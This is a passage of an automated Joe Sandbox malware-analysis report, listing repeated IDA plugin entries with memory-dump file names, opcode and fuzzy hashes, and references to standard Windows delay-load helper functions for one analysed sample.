                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: daac493d669b79e6707e3cd2f768d84b498131f64979ec70d21bc77807da222c
                • Instruction ID: 9cc7196b50e2fd5d274734ef3a47a36ffeb57fc29476a1f6a3af6266da6ebb49
                • Opcode Fuzzy Hash: daac493d669b79e6707e3cd2f768d84b498131f64979ec70d21bc77807da222c
                • Instruction Fuzzy Hash: 45B012A2E6C5826C3148B1077D52E3A074CE7C0B12B30811FB00DD02C0D4845C8A443A
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 70745046f432317ff2536a661ebe195f810dda9576d156467d6b3c5e9f44093f
                • Instruction ID: 6258647a70b0169c248ce4a0e5a5f881d0fc4ee2be968299fd07a7db591ef688
                • Opcode Fuzzy Hash: 70745046f432317ff2536a661ebe195f810dda9576d156467d6b3c5e9f44093f
                • Instruction Fuzzy Hash: B5B012B2E6C4426C3108B1076D52E3A075CE7C1B12B30801FB40DD01C0D4445C05443A
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 7ac388e936605f9b51098664071e7bbc16cf18e1621185067c1ae173e6222519
                • Instruction ID: 13ea7994f0b94b11ec07a33eaec0a8582d6ea7f1b0086f8f5e525efab08f4d16
                • Opcode Fuzzy Hash: 7ac388e936605f9b51098664071e7bbc16cf18e1621185067c1ae173e6222519
                • Instruction Fuzzy Hash: 1FB012B2E6C5426C3148B1077D52E3A075CE7C0B12B30411FB00DD01C0D4845C45443A
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: d1c1c92740a8bb770fc5a44b2c354bdcbd9444bff9609897aea811097d857b38
                • Instruction ID: 4e39c74eae59fa89e47e11125de50c3eb456bae31d10b8cc176f1bf668d17e76
                • Opcode Fuzzy Hash: d1c1c92740a8bb770fc5a44b2c354bdcbd9444bff9609897aea811097d857b38
                • Instruction Fuzzy Hash: C7B012B2E6C4426C310CB1076D52E3A075CF7C0B12B30401FB00DD01C0D4445C05443A
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 9f76e57ac3405dfac9dccf856dc6651207384134aa067038f1cc7ebd755cfec9
                • Instruction ID: 62022ffe3ebe98c77404c600e43f794bc07449fd7f9c511f1d0d7d73a2c2b783
                • Opcode Fuzzy Hash: 9f76e57ac3405dfac9dccf856dc6651207384134aa067038f1cc7ebd755cfec9
                • Instruction Fuzzy Hash: 1AB012B2E6C4426C310CB1076E52E3A075CE7C0B12B30401FB00DD01C0D4445D06543A
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 12b24d96f86dbbbe917c9f723c278833cde6627b1dd6b3ec0d4118cfa83b190a
                • Instruction ID: 1da23399507a8f64295038bdd237d5d2eb3d8c8be12149da6463e03acc6f9acc
                • Opcode Fuzzy Hash: 12b24d96f86dbbbe917c9f723c278833cde6627b1dd6b3ec0d4118cfa83b190a
                • Instruction Fuzzy Hash: C2B012A6E6C7427C31087103BDA2D3F070CE7C0B12B30852FB40DE00C0D4845C49843A
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: f232bc53b44499c1eb538204ee4898dc5ee058bb1ea9ee32daf6045a8c3764c3
                • Instruction ID: 2b004de08622c970bc339c7f4f50c0bdd5d75bdd070af597c1628a9298f7c9b8
                • Opcode Fuzzy Hash: f232bc53b44499c1eb538204ee4898dc5ee058bb1ea9ee32daf6045a8c3764c3
                • Instruction Fuzzy Hash: CAB012A6E6C5426C3108B107AD92E3F074CF7C0B12B30801FB40DD01C0D5445C05453A
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 2d19bc54ac5553c44ae63b9a71ff31c19c0a1769e25bb21137e560157c729f94
                • Instruction ID: 23e259083fdc6add8492a0b3d07a585fd8ef2f99f7dd5328d78e9812dedbb93d
                • Opcode Fuzzy Hash: 2d19bc54ac5553c44ae63b9a71ff31c19c0a1769e25bb21137e560157c729f94
                • Instruction Fuzzy Hash: EFB012A2E6C4426C3108B1076D52E3A074CE7C1B12B30C01FB40DD02C0D4445C0E443A
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 444274a167eea3909adb5925637fcdb69cf29f4781238631faceec51553370ba
                • Instruction ID: c7d4ee1afca0c9d063181d120e37aaa3de6e8b0f2ad943d9c7c9f5200cb0caa1
                • Opcode Fuzzy Hash: 444274a167eea3909adb5925637fcdb69cf29f4781238631faceec51553370ba
                • Instruction Fuzzy Hash: 84B012B2E6C5426C310CB1076E52E3A07CCE7C0B12F30401FB00DD01C0D5445C06583A
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 85226a0582bd37d19ba62506f0822bae662c4525422c1b43d20783bb1a9dc5a6
                • Instruction ID: c0b90572d3f033eca6575f2f2cfae673ec3654cfd18cf53acbf481cca7d66ee8
                • Opcode Fuzzy Hash: 85226a0582bd37d19ba62506f0822bae662c4525422c1b43d20783bb1a9dc5a6
                • Instruction Fuzzy Hash: 4FB012A2F6D4426C3108B1476D52E3A074DE7C1B12F30801FB50DD01C0D4445C05443A
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: f7ce2a9daf0277e2d91458595ec83c89a7af61201377e63a52e0b8dde0e917eb
                • Instruction ID: 5f5c929f1ada2c3da8a68886b1442f2a2b994d6704f91a3d705c7abbf1b99ac7
                • Opcode Fuzzy Hash: f7ce2a9daf0277e2d91458595ec83c89a7af61201377e63a52e0b8dde0e917eb
                • Instruction Fuzzy Hash: D4B012B2E6D5426C3148B2477D52E3A074DE7C0B12F30411FB10DD01C0D4845C45443A
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 5e8e08d7a8610ec1b06464496628a1e3d0b09f9b8172ab3319ddabb7c253d22f
                • Instruction ID: 768f1d6cbb3c1a2f8870710299faff1d1bbf2f98e16aca3caf20c088c995a1bb
                • Opcode Fuzzy Hash: 5e8e08d7a8610ec1b06464496628a1e3d0b09f9b8172ab3319ddabb7c253d22f
                • Instruction Fuzzy Hash: 49B012A2E6C5426C3108B1176D52E3A078CE7C1B12B30801FB50DD01C0D5445C05483A
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: f0aaf25a1955141276d15c50ceb3bc705ad0408047573194b0e865df9795e005
                • Instruction ID: 391932abe00798598cc7328a3434fe97492cf18ea5af664b1a303161cd519a26
                • Opcode Fuzzy Hash: f0aaf25a1955141276d15c50ceb3bc705ad0408047573194b0e865df9795e005
                • Instruction Fuzzy Hash: 46B012A2E7D4426C3108B1476D52E3A078DFBC0B12F30401FB14DD01C0D4445C05443A
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDAB2
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 76d60e2b4414d29190e7c523e20dafd944ad2c59c9c62247e48faa42061be83d
                • Instruction ID: 2d3cf828320e33b9ff323339576b66ab2b0cb1a494918405aacf80520f794f12
                • Opcode Fuzzy Hash: 76d60e2b4414d29190e7c523e20dafd944ad2c59c9c62247e48faa42061be83d
                • Instruction Fuzzy Hash: D7B012B2A6C041AC310CB5076C06E3E078CD3C0B12B30C12FF409C0184D44C4D09483A
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDAB2
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 415edab884a7d823c4ffc43c29da84a598b202c0a09b630f166443dd06a5150f
                • Instruction ID: 7059227d7615de2ade45217ba6fdbcda0a8ed5b434fa1d9450b2f549193d5fcf
                • Opcode Fuzzy Hash: 415edab884a7d823c4ffc43c29da84a598b202c0a09b630f166443dd06a5150f
                • Instruction Fuzzy Hash: 47B012A2A6C041AC310CB5076D06F3E078CE3C4B12B30852FF009C0184D4484C0E443A
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDAB2
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: cd88f31a7fec95069a55c74912de81abc5a3d00277b0cb3c066ec543f8e02585
                • Instruction ID: 340025386ca675e08bcaf2db481aff481cc5d1010a2c1ebee7fb98ac7715e2f0
                • Opcode Fuzzy Hash: cd88f31a7fec95069a55c74912de81abc5a3d00277b0cb3c066ec543f8e02585
                • Instruction Fuzzy Hash: 02B012A2AAC1416C710CB5076D46F3E078CF3C0B12B30812FF009C0184D5484C09453A
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDBD5
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: f61d9135021c6a5759d63670643de6196f64ba281764bd273867054be1f1c1a8
                • Instruction ID: 422109feee61d1de10bbc31a846ddb3cc3541eb74e603357ff6d24de30795395
                • Opcode Fuzzy Hash: f61d9135021c6a5759d63670643de6196f64ba281764bd273867054be1f1c1a8
                • Instruction Fuzzy Hash: 82B012A5B7C1467C320C51037C4BD3B071CE3C0B12B30412FB405E00C0EA445C4D403B
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EDBD5
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
